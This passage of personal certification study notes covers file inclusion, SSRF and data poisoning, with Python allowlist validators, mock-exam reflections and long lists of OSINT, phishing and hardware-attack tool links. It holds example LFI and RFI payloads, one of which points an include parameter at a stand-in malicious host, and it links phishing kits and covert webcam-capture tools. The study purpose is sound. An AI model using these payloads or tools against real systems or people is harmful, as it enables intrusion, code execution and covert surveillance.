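            "safe_accepts": safe_check(n),
        }
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(name, outcome)
```

The takeaway for code review: any check of the form `a + b <= limit` on fixed-width integers is suspect; rewrite it as `a <= limit - b` (with `b <= limit` known) or use an overflow-checked add.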
A buffer overflow is a software vulnerability where a program attempts to write more data to a buffer (a temporary storage area in memory) than it can hold, causing the excess data to overflow into adjacent memory. This can cause the program to crash or behave unpredictably. In some cases, it can be exploited by an attacker to execute arbitrary code or take control of the affected system.
##### LFI
In local file inclusion (LFI), the attacker makes the web app include a file that already exists on the hosting server. This is often accomplished on servers that are vulnerable to directory traversal; the attacker navigates through the server's file structure and has the application include (and therefore execute or disclose) a file of their choosing. As in the directory traversal example, an attacker could gain control over the server by opening a command prompt. A common tactic used in LFI is introducing a null character (%00 in URL encoding) at the end of the request to bypass code that automatically appends a .php suffix to the request, which lets the attacker reach non-PHP files:
`/webpage.php?FONT=../../Windows/system32/cmd.exe%00`
Caveat: null-byte truncation of include paths was fixed in PHP 5.3.4, so on current PHP the %00 trick fails, but traversal itself still works wherever the parameter reaches the file system unchecked.
##### RFI
In remote file inclusion (RFI), the attacker makes the web app include a file fetched from a remote location. An attacker could, for instance, force a parameter in a web page to call an external malicious link which serves the attacker's file. As an example, consider a page built in PHP that does not properly filter arbitrary values added to page parameters. The PHP code includes a FONT parameter which has five different options, each one a different font type.
The attacker can manipulate this parameter to inject an option that isn't one of these five, and can point it at an external URL that contains a malicious PHP file:
`/webpage.php?FONT=http://www.malice.foo/malware.php`
#### SSRF
Server-side request forgery (SSRF) is a web application vulnerability that occurs when an attacker can make a vulnerable web application send requests of the attacker's choosing to other internal or external systems. SSRF typically abuses the application's legitimate ability to make HTTP requests: the server becomes a proxy that reaches "hidden" internal systems (or the cloud metadata service) that the attacker cannot reach directly, giving access to protected features or data.
https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html
Demo https://www.hacksplaining.com/exercises/ssrf & PortSwigger (the maintainers of Burp Suite) have published an excellent technical overview of SSRF. https://portswigger.net/web-security/ssrf
A well-documented example of SSRF occurred in the 2019 Capital One breach. https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/
Some common techniques used to exploit SSRF vulnerabilities include the following:
- An attacker uses SSRF to access internal resources on a network, such as databases or file systems, that should be inaccessible directly from the Internet.
- An attacker can use SSRF to access other web applications to steal data or launch attacks against other systems.
- An attacker can use SSRF to scan the internal network for open ports or other vulnerable services, which are used to launch further attacks.
To prevent SSRF vulnerabilities, web application developers should consider the following:
- Always validate user input - Ensure that all user input is properly validated and sanitised to prevent attackers from manipulating requests.
- Allowlist (formerly known as whitelist) hosts - Web applications should only be allowed to access trusted hosts and block all other requests by default.
- Firewall and network segmentation - Network segmentation can prevent unauthorised access to internal systems when combined with firewalls to block traffic from unauthorised sources.
- Secure coding practices - Developers should follow secure coding practices, such as using well established and trusted libraries, avoiding user-controlled data in requests, and implementing safe configuration settings.
#### Data poisoning
Data poisoning is an attack that involves deliberately manipulating or corrupting the data used to train machine learning (ML) models or artificial intelligence (AI) systems. The goal of a data poisoning attack is to undermine the accuracy and reliability of the ML model and potentially cause harm or damage by making the model provide incorrect or biased results.
Some strategies designed to mitigate the risk of data poisoning attacks include the following:
- Data Validation - Before using data in an ML model, it is crucial to validate the quality and authenticity of the data to identify malicious or corrupted inputs that could result in a data poisoning attack.
- Data Diversity - Using a diverse range of data can help prevent data poisoning attacks by making it more difficult to manipulate the inputs to modify the results.
- Anomaly Detection - Using anomaly detection techniques can help identify unusual data patterns that may indicate a data poisoning attack.
- Robust Models - Creating ML models resilient to unexpected inputs and adversarial attacks can help mitigate the risk of data poisoning.
- Regular Model Testing and Auditing - Regularly testing and auditing ML models can help to identify issues and vulnerabilities, including evidence of data poisoning attacks.
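The file-inclusion FONT parameter (five known fonts) and the SSRF host allowlist above come down to the same rule: never use the attacker's value as the target, map it to something you chose. The following added example (not the course's or any project's code) shows both validators in Python. The font directory, the five font names, the host allowlist and the stand-in resolver are assumptions; the SSRF check also rejects hosts whose DNS answer is a private, loopback, link-local or otherwise non-public address, which is what stops `169.254.169.254` reaching the cloud metadata endpoint.

```python
"""Allowlist validation for file inclusion (LFI/RFI) and SSRF targets (added example).

Hypothetical app: a page takes FONT (one of five fonts) and a URL the server fetches.
"""
import ipaddress
import os
from urllib.parse import urlsplit

FONT_DIR = os.path.realpath("/var/www/app/fonts")                     # hypothetical
ALLOWED_FONTS = {"arial", "courier", "georgia", "times", "verdana"}   # the five options
ALLOWED_HOSTS = {"api.example.com", "cdn.example.com"}                # hypothetical allowlist


def resolve_font_path(font: str) -> str:
    """Map the FONT parameter to a file inside FONT_DIR, or raise ValueError.

    Rejects NUL bytes, anything not on the allowlist and, as defence in depth,
    any resolved path outside FONT_DIR. So "../../Windows/system32/cmd.exe%00"
    and "http://www.malice.foo/malware.php" never reach include().
    """
    if "\x00" in font:
        raise ValueError("NUL byte in parameter")
    name = font.lower()
    if name not in ALLOWED_FONTS:
        raise ValueError(f"font not allowed: {font!r}")
    path = os.path.realpath(os.path.join(FONT_DIR, name + ".php"))
    if os.path.commonpath([FONT_DIR, path]) != FONT_DIR:
        raise ValueError("path escapes font directory")
    return path


def is_public_ip(addr: str) -> bool:
    """True only for globally routable unicast addresses."""
    ip = ipaddress.ip_address(addr)
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_reserved or ip.is_multicast or ip.is_unspecified)


def validate_outbound_url(url: str, resolver) -> str:
    """Return url if the server may fetch it, else raise ValueError.

    `resolver(host) -> list[str]` is injected so this runs offline; in production
    use socket.getaddrinfo and then connect to the address you validated, not to
    the hostname again (otherwise DNS rebinding can swap the answer between
    check and use).
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    if parts.username or parts.password:
        raise ValueError("credentials in URL")      # blocks http://allowed@evil/ tricks
    host = parts.hostname or ""
    if host not in ALLOWED_HOSTS:
        raise ValueError(f"host not allowed: {host!r}")
    addrs = resolver(host)
    if not addrs:
        raise ValueError(f"{host} did not resolve")
    for addr in addrs:
        if not is_public_ip(addr):
            raise ValueError(f"{host} resolves to non-public {addr}")
    return url


# Constructed stand-in for DNS: cdn.example.com is "poisoned" to the metadata IP.
FAKE_DNS = {
    "api.example.com": ["8.8.8.8"],
    "cdn.example.com": ["169.254.169.254"],
}


def fake_resolver(host: str) -> list:
    return FAKE_DNS.get(host, [])


def rejected(fn, *args) -> bool:
    """True if fn(*args) raises ValueError; used for the self-checks below."""
    try:
        fn(*args)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(resolve_font_path("Arial"))
    print(rejected(resolve_font_path, "../../Windows/system32/cmd.exe\x00"))
    print(validate_outbound_url("https://api.example.com/v1/fonts", fake_resolver))
    print(rejected(validate_outbound_url, "http://169.254.169.254/latest/meta-data/", fake_resolver))
```

Design note: the font check does not try to sanitise `../` out of the input; it maps an allowlisted token to a path the code chose, and the `realpath`/`commonpath` containment check only exists to catch a future bug in that mapping. Likewise the SSRF check does not blocklist `localhost` or `169.254.169.254`; it allowlists hosts and then verifies what they resolve to.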
Data Poisoning Examples
- **Amazon Rekognition System** - Researchers demonstrated a data poisoning attack on Amazon's Rekognition facial recognition system by subtly changing a small percentage of the images used to train the system. They were able to cause the system to misidentify individuals in real world scenarios.
- **Google Maps** - Researchers showed that by submitting many fake edits to Google Maps, they could manipulate the search results for a particular location. By making small changes to the location's data, such as changing its name or address, they could push it higher up in search results or even make it disappear altogether.
- **Spam Filters** - Researchers showed that inserting specific words into legitimate emails could bypass the spam filters used by popular email services like Gmail and Outlook. By doing so, they could send spam emails that would appear in users' inboxes without being flagged as spam.

### 14c Implementing Controls to Prevent Attacks
![[CySa preventing attacks.png]]

---
# Mock Questions
## Scenario based
![[scenario 1 text.png]]
![[Scenario 1.png]]
incorrect - lesson 8 exploring incident response planning
![[Scenario 2 text.png]]
![[Scenario 2.png]]
correct
![[Scenario 3 text.png]]
![[Scenario 3.png]]
correct
## Questions I was unsure about
Correct: topic 13b id mal activity through analysis - got q right, but log types: system vs app vs event vs security
![[mock q 1.png]]
B - topic 2c threat hunting concepts, isolated network hunting
![[mock q 2.png]]
A - topic 2c threat hunting concepts
![[mock q 3.png]]
A, B, C - topic 14b recommending controls to mitigate application attacks. Using a diverse range of data can help prevent data poisoning attacks by making it more difficult to manipulate the inputs to modify the results.
"output validation" is made up - input validation, DUH
![[mock q 4.png]]
D - topic 5b
![[mock q 5.png]]
correct, but lucky - topic 14b controls to mitigate successful application attacks
![[mock q 6.png]]
topic 12a analysing web vulns - ZAP is an open source web app scanner; can generate a report
## Review wrong answers
- [x] topic 1b control types and methods - operational controls
- [x] topic 2c threat hunting concepts - isolated network hunting
- [x] topic 3a reviewing system and network architecture concepts - SASE: e2e encryption regardless of location; virtualisation security benefits
- [x] topic 5b understanding vuln scanning methods - agent vs agentless; software analysis: static, dynamic, reverse engineering
- [x] topic 5c special considerations - segmented network; device fingerprinting
- [x] topic 6b vuln context considerations - prioritisation
- topic 7b vuln reporting and outcomes - CVSS importance; type of vuln irrelevant; proprietary software
- topic 8b performing incident response activities - can't follow incident response process; unique method
- topic 9c analyse incident response activities - mean time to respond; effectiveness
- topic 10b attack methodology frameworks ^
- topic 11a network attack indicators - beaconing
- topic 14a explore secure software development practices - prevent cross site scripting

Lesson scores (questions answered, percentage correct):
- Lesson 1: Understanding Vulnerability Response, Handling, and Management - 7 of 7 - 86%
- Lesson 2: Exploring Threat Intelligence and Threat Hunting Concepts - 12 of 12 - 75%
- Lesson 3: Explaining Important System and Network Architecture Concepts - 6 of 6 - 67%
- Lesson 4: Understanding Process Improvement in Security Operations - 2 of 2 - 100%
- Lesson 5: Implementing Vulnerability Scanning Methods - 7 of 7 - 43%
- Lesson 6: Performing Vulnerability Analysis - 5 of 5 - 60%
- Lesson 7: Communicating Vulnerability Information - 3 of 3 - 33%
- Lesson 8: Explaining Incident Response Activities - 12 of 12 - 83%
- Lesson 9: Demonstrating Incident Response Communication - 6 of 6 - 83%
- Lesson 10: Applying Tools to Identify Malicious Activity - 7 of 7 - 86%
- Lesson 11: Analyzing Potentially Malicious Activity - 3 of 3 - 67%
- Lesson 12: Understanding Application Vulnerability Assessment - 2 of 2 - 50%
- Lesson 13: Exploring Scripting Tools and Analysis Concepts - 7 of 7 - 100%
- Lesson 14: Understanding Application Security and Attack Mitigation Best Practices - 8 of 8 - 75%

# Misc additional links from training provider
portswigger labs https://portswigger.net/web-security/all-labs#
Hacksplaining [Lessons](https://www.hacksplaining.com/lessons)
phishing: [https://github.com/trustedsec/social-engineer-toolkit](https://github.com/trustedsec/social-engineer-toolkit) and Gophish [https://getgophish.com/](https://getgophish.com/). The Social-Engineer Toolkit offers many capabilities, such as creating a legitimate-looking web page or creating malicious attachments, whereas Gophish is more focused on providing a user-friendly graphical interface and tools for managing campaigns.
[https://surbl.org/](https://surbl.org/) Intelligence and reputation services covering spam and abuse sites, phishing, malware, and cracked sites.
[https://dnstwist.it/](https://dnstwist.it/) Phishing domain scanner. Wondering if threat actors created phishing domains to masquerade as an online service or property? Search the original domain or brand name etc.
[https://github.com/0xDanielLopez/phishing_kits](https://github.com/0xDanielLopez/phishing_kits) Exposing phishing kits seen from [phishunt.io](http://phishunt.io/)
[https://github.com/hasanfirnas/symbiote](https://github.com/hasanfirnas/symbiote) Symbiote is a social engineering tool designed to create a phishing page and capture webcam images. By requesting camera permission on the victim's device, this script can take pictures covertly.
[https://easydmarc.com/tools/phishing-url](https://easydmarc.com/tools/phishing-url) Phishing Link (URL) & email checker
[https://github.com/mitchellkrogza/Phishing.Database](https://github.com/mitchellkrogza/Phishing.Database) Phishing Domains, URLs, websites and threats database.
[https://isitphishing.org/](https://isitphishing.org/) Type what you want to test for phishing
[https://www.ncsc.gov.uk/collection/phishing-scams](https://www.ncsc.gov.uk/collection/phishing-scams)
[https://openphish.com/phishing_activity.html](https://openphish.com/phishing_activity.html)
[https://phishing.army/](https://phishing.army/) blocklists
[https://phishcheck.me/](https://phishcheck.me/) Find out what's lurking behind that URL.
[https://phishunt.io/](https://phishunt.io/) Active websites that are suspected of being phishing.
[https://phishing-initiative.eu/contrib/](https://phishing-initiative.eu/contrib/) Verify or report a website.
[https://www.phishlabs.com/blog/](https://www.phishlabs.com/blog/) - threat intelligence news and updates. Detailed reports, accessible after signing up for the mailing list.
[https://phishstats.info/](https://phishstats.info/)
[https://phishtank.org/index.php](https://phishtank.org/index.php) PhishTank is a collaborative clearing house for data and information about phishing on the Internet. Alternative site [https://www.phishtank.com/](https://www.phishtank.com/)
[https://www.phishtool.com/](https://www.phishtool.com/)
[https://threatcop.com/phishing-url-checker](https://threatcop.com/phishing-url-checker)
[Should I Block It?](https://shouldiblockit.com/)
https://www.nirsoft.net/
https://start.me/p/ydqwxP/rss-feeds
https://youtu.be/W8HG3sLsp8Y
•[https://www.tindie.com/products/aprbrother/cactus-whid-wifi-hid-injector-usb-rubberducky/](https://www.tindie.com/products/aprbrother/cactus-whid-wifi-hid-injector-usb-rubberducky/)
•[https://www.tindie.com/products/aprbrother/evil-crow-cable/](https://www.tindie.com/products/aprbrother/evil-crow-cable/)
•[https://www.wallofsheep.com/pages/juice](https://www.wallofsheep.com/pages/juice) (juice jacking)
•[https://zsecurity.org/product/badusb-keystroke-injection-cable/](https://zsecurity.org/product/badusb-keystroke-injection-cable/)
•[https://twitter.com/androidmalware2/status/1679110865331576833](https://twitter.com/androidmalware2/status/1679110865331576833) Bruteforcing PIN protection of popular app using $3 ATTINY85
•[https://securityintelligence.com/articles/juice-jacking-is-it-real-or-media-hype/](https://securityintelligence.com/articles/juice-jacking-is-it-real-or-media-hype/)
•[https://dev.to/lpjune/make-a-rubber-ducky-for-3-with-digispark-2fp9](https://dev.to/lpjune/make-a-rubber-ducky-for-3-with-digispark-2fp9)
•[http://www.airdrivewifi.com/](http://www.airdrivewifi.com/)
•[https://counterespionage.com/malicious-usb-cables/](https://counterespionage.com/malicious-usb-cables/)
•[https://dstike.com/products/dstike-wifi-deauther-mini](https://dstike.com/products/dstike-wifi-deauther-mini)
•[https://www.ebay.co.uk/sch/i.html?_from=R40&_trksid=p2380057.m570.l1313&_nkw=digispark&_sacat=0](https://www.ebay.co.uk/sch/i.html?_from=R40&_trksid=p2380057.m570.l1313&_nkw=digispark&_sacat=0) if link does not work then search for digispark on eBay
•[https://en.rattibha.com/thread/1827621860193763785](https://en.rattibha.com/thread/1827621860193763785) SPY GADGETS •[https://www.fabtolab.com/do-it-yourself/Hacking-Spying-Surveillance?page=4](https://www.fabtolab.com/do-it-yourself/Hacking-Spying-Surveillance?page=4) •[https://flipperzero.one/](https://flipperzero.one/) •[https://greatscottgadgets.com/hackrf/](https://greatscottgadgets.com/hackrf/) •[https://www.hackers-arise.com/post/using-multiblue-to-control-any-bluetooth-mobile-device](https://www.hackers-arise.com/post/using-multiblue-to-control-any-bluetooth-mobile-device) •[https://hackernoon.com/low-cost-usb-rubber-ducky-pen-test-tool-for-3-using-digispark-and-duck2spark-5d59afc1910](https://hackernoon.com/low-cost-usb-rubber-ducky-pen-test-tool-for-3-using-digispark-and-duck2spark-5d59afc1910) •[https://hak5.org/](https://hak5.org/) •[https://www.keelog.com/](https://www.keelog.com/) •[https://www.keydemon.com/en/](https://www.keydemon.com/en/) •[https://www.keyghost.com/](https://www.keyghost.com/) •[https://lotevia.com/products/universal-remote-control-replicator?twclid=2-5zvo6k3bjmxju9xxaulhrzkbi](https://lotevia.com/products/universal-remote-control-replicator?twclid=2-5zvo6k3bjmxju9xxaulhrzkbi) •[https://www.mobile-hacker.com/](https://www.mobile-hacker.com/) •[https://samy.pl/magspoof/](https://samy.pl/magspoof/) •[https://shop.hak5.org/collections/mischief-gadgets-homepage/products/omg-plug?variant=39464643788913&redirect_mongo_id=61f743187cd5c600186ff8eb&utm_source=Springbot&utm_medium=Email&utm_campaign=61f743187cd5c600186ff8ea](https://shop.hak5.org/collections/mischief-gadgets-homepage/products/omg-plug?variant=39464643788913&redirect_mongo_id=61f743187cd5c600186ff8eb&utm_source=Springbot&utm_medium=Email&utm_campaign=61f743187cd5c600186ff8ea) •[https://www.spycraft.co.uk/spy-equipment/gsm-spy-cable/](https://www.spycraft.co.uk/spy-equipment/gsm-spy-cable/) 
•[https://spyscape.com/article/hide-data-in-plain-sight-a-usb-drive-inside-a-usb-charger-cable](https://spyscape.com/article/hide-data-in-plain-sight-a-usb-drive-inside-a-usb-charger-cable)
[https://i-intelligence.eu/uploads/public-documents/OSINT_Handbook_2020.pdf](https://i-intelligence.eu/uploads/public-documents/OSINT_Handbook_2020.pdf)
[https://start.me/p/Wp1kpe/socmint](https://start.me/p/Wp1kpe/socmint)
[https://start.me/p/RMKeQv/search-social-media](https://start.me/p/RMKeQv/search-social-media)
[https://start.me/p/4K0DXg/social-media](https://start.me/p/4K0DXg/social-media)
[https://start.me/p/b5MG5r/social-media-intelligence-socmint](https://start.me/p/b5MG5r/social-media-intelligence-socmint)
[https://start.me/p/z4Lb6M/social-toolkit](https://start.me/p/z4Lb6M/social-toolkit)
[https://start.me/p/ADr4qn/05-socmint](https://start.me/p/ADr4qn/05-socmint)
[https://cirt.net/passwords](https://cirt.net/passwords) Default passwords
[https://www.routerpasswords.com/](https://www.routerpasswords.com/) Default passwords
[https://codefinder.org/](https://codefinder.org/) Reposearch
[https://www.copyscape.com/](https://www.copyscape.com/)
[https://github.com/google/codesearch](https://github.com/google/codesearch)
[https://hackertarget.com/reverse-analytics-search/](https://hackertarget.com/reverse-analytics-search/)
[https://nerdydata.com/](https://nerdydata.com/)
[https://publicwww.com/](https://publicwww.com/)
[https://searchcode.com/](https://searchcode.com/)
[https://snipplr.com/](https://snipplr.com/)
[https://www.webfinery.com/search](https://www.webfinery.com/search)
[https://github.com/ElevenPaths/FOCA](https://github.com/ElevenPaths/FOCA) ; [www.elevenpaths.com](http://www.elevenpaths.com/) – FOCA, a hidden/meta data locator for a variety of file types
[https://cybersecuritycloud.telefonicatech.com/en/innovation-labs/innovation-technologies/foca](https://cybersecuritycloud.telefonicatech.com/en/innovation-labs/innovation-technologies/foca) FOCA (Fingerprinting Organisations with Collected Archives) is a tool written by ElevenPaths that can be used to scan, analyse, extract and classify information from remote web servers and the metadata hidden in the documents they publish.
[https://jimpl.com/](https://jimpl.com/) Online EXIF data viewer. Uncover hidden metadata from your photos. Find when and where the picture was taken. Remove EXIF data from the image to protect your personal info.
[https://metashieldclean-up.tu.com/](https://metashieldclean-up.tu.com/)
[https://www.extractmetadata.com/](https://www.extractmetadata.com/) - an on-line hidden/meta data locator for a variety of file types
[https://start.me/p/6rqQbo/security-news](https://start.me/p/6rqQbo/security-news)
[https://start.me/p/ydqwxP/rss-feeds](https://start.me/p/ydqwxP/rss-feeds)
[https://start.me/p/wMrA5z/cyber-threat-intelligence](https://start.me/p/wMrA5z/cyber-threat-intelligence)
[https://start.me/p/OmOrJb/threat-hunting](https://start.me/p/OmOrJb/threat-hunting)
[https://start.me/p/aN5jX8/malware-analysis](https://start.me/p/aN5jX8/malware-analysis)
Whois
WHOIS was affected by GDPR: registrant contact details are now usually redacted, so historical and reverse WHOIS services matter more for attribution.
[https://d09r.github.io/assay-url-inspection-tools/](https://d09r.github.io/assay-url-inspection-tools/)
[https://inteltechniques.com/tools/Domain.html](https://inteltechniques.com/tools/Domain.html)
[https://www.godaddy.com/en-uk/whois](https://www.godaddy.com/en-uk/whois)
[https://gwhois.org/](https://gwhois.org/)
[https://iplogger.org/whois/](https://iplogger.org/whois/)
[https://lookup.icann.org/en](https://lookup.icann.org/en)
[https://osint.hippie.cat/](https://osint.hippie.cat/) Select domain
[https://osint.sh/whoishistory/](https://osint.sh/whoishistory/)
[https://ping.eu/](https://ping.eu/)
Online Ping, Traceroute, DNS lookup, WHOIS, Port check, Reverse lookup, Proxy checker, Bandwidth meter, Network calculator, Network mask calculator, Country by IP, Unit converter
[https://www.reversewhois.io/](https://www.reversewhois.io/)
[https://www.ripe.net/](https://www.ripe.net/)
[https://start.me/p/ek2p4x/internetrecherche-2-0](https://start.me/p/ek2p4x/internetrecherche-2-0) (IP WHOIS)
[http://www.tcpiputils.com/tools#domain](http://www.tcpiputils.com/tools#domain)
[https://viewdns.info/](https://viewdns.info/)
[https://www.whois.com/](https://www.whois.com/)
[https://whois.icann.org/en/](https://whois.icann.org/en/)
[https://www.whoxy.com/](https://www.whoxy.com/) (e.g. [whoxy.com/qa.com](http://whoxy.com/qa.com))
[https://whois.domaintools.com/](https://whois.domaintools.com/)
[https://whoisology.com/](https://whoisology.com/)
[https://www.yougetsignal.com/tools/whois-lookup/](https://www.yougetsignal.com/tools/whois-lookup/)
[https://who.is/](https://who.is/)
[https://www.whois.com/whois/](https://www.whois.com/whois/)
[https://whois.domaintools.com/qa.com](https://whois.domaintools.com/qa.com) (change the end for target)
Sandbox
Joe Sandbox - [https://www.joesandbox.com/](https://www.joesandbox.com/) & Cuckoo Sandbox - [https://cuckoo.cert.ee/](https://cuckoo.cert.ee/)
[https://github.com/CYB3RMX/Qu1cksc0pe](https://github.com/CYB3RMX/Qu1cksc0pe) All in one malware analysis tool
[https://urlscan.io/](https://urlscan.io/)
[https://www.malwarebytes.com/](https://www.malwarebytes.com/)
[https://www.hybrid-analysis.com/](https://www.hybrid-analysis.com/)
[https://www.virustotal.com/gui/home/upload](https://www.virustotal.com/gui/home/upload)
[https://any.run/](https://any.run/)
[https://malwareanalysis.tools/](https://malwareanalysis.tools/)
[https://malpedia.caad.fkie.fraunhofer.de/families](https://malpedia.caad.fkie.fraunhofer.de/families) Malware Families
[https://maltiverse.com/trial](https://maltiverse.com/trial)
[https://socradar.io/labs/ioc-radar/](https://socradar.io/labs/ioc-radar/)
[https://tria.ge/](https://tria.ge/) Triage, also known as the Triage Sandbox, is a malware sandboxing service initially created by Hatching. It executes malware samples within a secure and isolated environment, enabling the analysis of their actions and evaluation of their potential risks.
[https://start.me/p/m6aeXo/cybersecurity-ctfs-tools](https://start.me/p/m6aeXo/cybersecurity-ctfs-tools)
[https://start.me/p/X25q7l/threat-informed-defense-ecosystem](https://start.me/p/X25q7l/threat-informed-defense-ecosystem)
[https://start.me/p/m6bBNv/triage-investigations-ir](https://start.me/p/m6bBNv/triage-investigations-ir)
[https://virusscan.jotti.org/en](https://virusscan.jotti.org/en)
[https://www.inetsim.org/](https://www.inetsim.org/) INetSim is a software suite for simulating common internet services in a lab environment, e.g. for analysing the network behaviour of unknown malware samples.
Domain tools / DNS
[https://dnsdumpster.com/](https://dnsdumpster.com/)
[https://www.robtex.com/](https://www.robtex.com/)
[https://threatcrowd.org/](https://threatcrowd.org/) This service provides a unique view of the domains associated with your target.
[https://web-check.as93.net/](https://web-check.as93.net/)
[https://informationlaundromat.com/](https://informationlaundromat.com/)
[https://urlscan.io/](https://urlscan.io/)
[https://subgraph.com/vega/](https://subgraph.com/vega/)
recon
OSINT Framework / Inteltechniques – a website directory of data discovery and gathering tools for almost any kind of source or platform. [https://osintframework.com/](https://osintframework.com/) or [https://inteltechniques.com/tools/index.html](https://inteltechniques.com/tools/index.html)
Spiderfoot - Automates OSINT for threat intelligence and mapping your attack surface.
[https://github.com/smicallef/spiderfoot](https://github.com/smicallef/spiderfoot) & [https://www.spiderfoot.net/attack-surface-monitoring/](https://www.spiderfoot.net/attack-surface-monitoring/)
Google Dorks – OSINT data gathering method using clever Google search queries with advanced arguments. [https://pentest-tools.com/information-gathering/google-hacking](https://pentest-tools.com/information-gathering/google-hacking) and [https://www.sans.org/posters/google-hacking-and-defense-cheat-sheet/](https://www.sans.org/posters/google-hacking-and-defense-cheat-sheet/)
[Shodan.io](http://shodan.io/) – a search engine for online devices/IoT and a way to get insights into any weaknesses they may have. [https://www.shodan.io/](https://www.shodan.io/)
[https://censys.com/](https://censys.com/)
[https://www.zoomeye.org/](https://www.zoomeye.org/) - advertised as China's first cyberspace search engine, constantly updated, and developed with new features.
Maltego – an OSINT tool for gathering information and bringing it all together for graphical correlation analysis. [https://www.maltego.com/](https://www.maltego.com/)
Metasploit – a powerful penetration testing framework that can find network vulnerabilities and be used to exploit them. [https://www.metasploit.com/](https://www.metasploit.com/)
Recon-ng – an open-source web reconnaissance tool developed in Python that continues to grow as developers contribute to its capabilities. [https://www.kali.org/tools/recon-ng/](https://www.kali.org/tools/recon-ng/)
Aircrack-ng – a Wi-Fi network security testing and cracking suite that can be used both defensively and offensively to find weak or compromised networks. [https://www.aircrack-ng.org/](https://www.aircrack-ng.org/)
Burp Suite is an integrated platform for performing security testing of web applications.
Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities. [https://www.kali.org/tools/burpsuite/](https://www.kali.org/tools/burpsuite/)